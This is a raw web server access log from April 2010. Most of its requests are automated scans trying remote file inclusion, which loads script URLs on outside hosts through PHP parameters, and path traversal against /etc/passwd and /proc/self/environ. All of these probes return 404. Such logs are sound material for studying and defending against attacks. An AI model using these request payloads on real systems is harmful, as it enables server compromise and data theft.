188.165.195.229 - - [07/Apr/2010:05:52:06 -0400] "GET /logs/error_log.Q110021500//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:52:06 -0400] "GET /logs/access_log.Q110021500//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:52:16 -0400] "GET /logs/error_log.Q110021500//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:52:16 -0400] "GET //myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:52:16 -0400] "GET /logs//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:52:16 -0400] "GET /logs/access_log.Q110021500//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.217.198.155 - - [07/Apr/2010:05:52:53 -0400] "GET /logs/error_log.Q109052000//appserv/main.php?appserv_root=http://www.bowlingkorea.com//club/main/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
147.96.35.16 - - [07/Apr/2010:05:52:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
147.96.35.16 - - [07/Apr/2010:05:52:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
147.96.35.16 - - [07/Apr/2010:05:52:58 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
147.96.35.16 - - [07/Apr/2010:05:52:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.249.65.179 - - [07/Apr/2010:05:53:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011AFD595551B600AFBB05E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.94.188 - - [07/Apr/2010:05:53:16 -0400] "GET /errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:53:16 -0400] "GET /logs/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:53:16 -0400] "GET /logs/access_log.Q109062900%20%20/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:19 -0400] "GET /logs/error_log.Q109060600%20%20//table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:19 -0400] "GET /logs//table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:19 -0400] "GET /logs/error_log.Q110010800%20%20//table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:19 -0400] "GET //table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:53:21 -0400] "GET /logs/access_log.Q109062900%20%20/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:53:21 -0400] "GET /logs/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:53:21 -0400] "GET /errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:39 -0400] "GET //table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:39 -0400] "GET /logs/error_log.Q109060600%20%20//table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:39 -0400] "GET /logs//table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:05:53:39 -0400] "GET /logs/error_log.Q110010800%20%20//table.php?spaw_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:53:42 -0400] "GET /logs/access_log.Q109052200%20%20/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:05:53:52 -0400] "GET /logs/access_log.Q109052200%20%20/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:54:30 -0400] "GET /%22.php?p=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:54:30 -0400] "GET /logs/%22.php?p=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:05:54:30 -0400] "GET /logs/access_log.Q110011800%20%20/%22.php?p=http://www.kioscomayor.com//archivo5/id1.txt%20? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:54:35 -0400] "GET /logs/error_log.Q110021500%20%20//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:54:35 -0400] "GET /logs/error_log.Q110021500%20%20//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:54:36 -0400] "GET /logs/access_log.Q110021500%20%20//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:54:39 -0400] "GET /logs/access_log.Q110021500%20%20//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:54:45 -0400] "GET /logs/error_log.Q110021500%20%20//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:05:54:49 -0400] "GET /logs/access_log.Q110021500%20%20//myevent.php?myevent_path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:05:54:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.88.4.74 - - [07/Apr/2010:05:55:38 -0400] "GET /logs/access_log.Q110022700%20%20/components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://ezt.cz/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
124.217.198.155 - - [07/Apr/2010:05:55:43 -0400] "GET /logs/access_log.Q109080600//appserv/main.php?appserv_root=http://www.bowlingkorea.com//club/main/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:05:55:43 -0400] "GET /images/_notes/download_check_back.jpg.mno HTTP/1.1" 200 260 "-" "Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.74 - - [07/Apr/2010:05:55:47 -0400] "GET /components/com_fabrik/libs/Blowfish.php?mosConfig_absolute_path=http://ezt.cz/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.88.4.74 - - [07/Apr/2010:05:55:47 -0400] "GET /logs/components/com_fabrik/libs/Blowfish.php?mosConfig_absolute_path=http://ezt.cz/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.88.4.74 - - [07/Apr/2010:05:55:55 -0400] "GET /logs/access_log.Q110022700%20%20/components/com_fabrik/libs/Blowfish.php?mosConfig_absolute_path=http://ezt.cz/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
219.94.194.248 - - [07/Apr/2010:05:56:08 -0400] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.94.194.248 - - [07/Apr/2010:05:56:09 -0400] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.94.194.248 - - [07/Apr/2010:05:56:09 -0400] "GET /logs/access_log.Q110020500%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.94.194.248 - - [07/Apr/2010:05:56:27 -0400] "GET /logs/access_log.Q109052900%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.73.226.51 - - [07/Apr/2010:05:57:33 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:05:57:33 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
118.217.216.132 - - [07/Apr/2010:05:58:42 -0400] "GET /%22.php?p=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:05:58:42 -0400] "GET /logs/access_log.Q110011800%20%20/%22.php?p=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.217.216.132 - - [07/Apr/2010:05:58:43 -0400] "GET /logs/%22.php?p=http://www.kioscomayor.com//archivo5/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.25.33 - - [07/Apr/2010:05:59:18 -0400] "GET /logs//admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:05:59:18 -0400] "GET //admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:05:59:18 -0400] "GET //admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:05:59:18 -0400] "GET /logs//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:05:59:18 -0400] "GET //admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:05:59:18 -0400] "GET /logs//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:05:59:18 -0400] "GET /logs/errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:05:59:21 -0400] "GET /errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
95.108.128.242 - - [07/Apr/2010:05:59:46 -0400] "GET /images/_notes/nav_store_cart_off_r1_c3.jpg.mno HTTP/1.1" 200 210 "-" "Yandex/1.01.001 (compatible; Win16; I)"
72.46.157.102 - - [07/Apr/2010:06:00:06 -0400] "GET /logs/access_log.Q110032100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:00:06 -0400] "GET //tools/send_reminders.php?includedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:00:06 -0400] "GET /logs/access_log.Q109111100//tools/send_reminders.php?includedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:00:06 -0400] "GET /logs//tools/send_reminders.php?includedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:00:13 -0400] "GET //tools/send_reminders.php?includedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:00:13 -0400] "GET /logs/access_log.Q109111100%20%20//tools/send_reminders.php?includedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:00:13 -0400] "GET /logs//tools/send_reminders.php?includedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.19.4.18 - - [07/Apr/2010:06:00:45 -0400] "GET /logs/access_log.Q109100200//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
128.210.4.82 - - [07/Apr/2010:06:00:53 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:06:00:53 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:01:07 -0400] "GET /logs/access_log.Q110012700%20%20//tools/send_reminders.php?includedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET /logs//admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET //admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET /logs/access_log.Q109051800//admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET /logs//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET //admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET /logs/access_log.Q109051800//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET /logs//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET //admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:28 -0400] "GET /logs/access_log.Q109051800//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:29 -0400] "GET /errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:29 -0400] "GET /logs/errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:02:29 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
219.94.194.248 - - [07/Apr/2010:06:02:50 -0400] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.94.194.248 - - [07/Apr/2010:06:02:50 -0400] "GET /logs/access_log.Q109053000//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.194.248 - - [07/Apr/2010:06:02:50 -0400] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.94.194.248 - - [07/Apr/2010:06:02:59 -0400] "GET /logs/error_log.Q110020300//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:06:02:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.25.33 - - [07/Apr/2010:06:03:10 -0400] "GET /logs/error_log.Q109051800//admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:03:11 -0400] "GET /logs/error_log.Q109051800//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:03:11 -0400] "GET /logs/error_log.Q109051800//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:03:11 -0400] "GET /logs/error_log.Q109051800/errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
217.73.226.51 - - [07/Apr/2010:06:03:12 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:03:12 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:03:12 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
128.210.4.82 - - [07/Apr/2010:06:03:13 -0400] "GET /logs/access_log.Q110031600//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.73.226.51 - - [07/Apr/2010:06:03:23 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:03:23 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:03:24 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:03:28 -0400] "GET /logs/error_log.Q109100900//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:03:29 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:03:29 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.833"
95.108.128.242 - - [07/Apr/2010:06:03:47 -0400] "GET /images/_notes/download_autogft_lg.jpg.mno HTTP/1.1" 200 258 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.191 - - [07/Apr/2010:06:04:22 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.73.226.51 - - [07/Apr/2010:06:05:44 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:05:44 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
66.249.65.182 - - [07/Apr/2010:06:05:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2122095F7981820042BC03Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.73.226.51 - - [07/Apr/2010:06:05:48 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:05:49 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:05:54 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
202.125.44.136 - - [07/Apr/2010:06:06:12 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
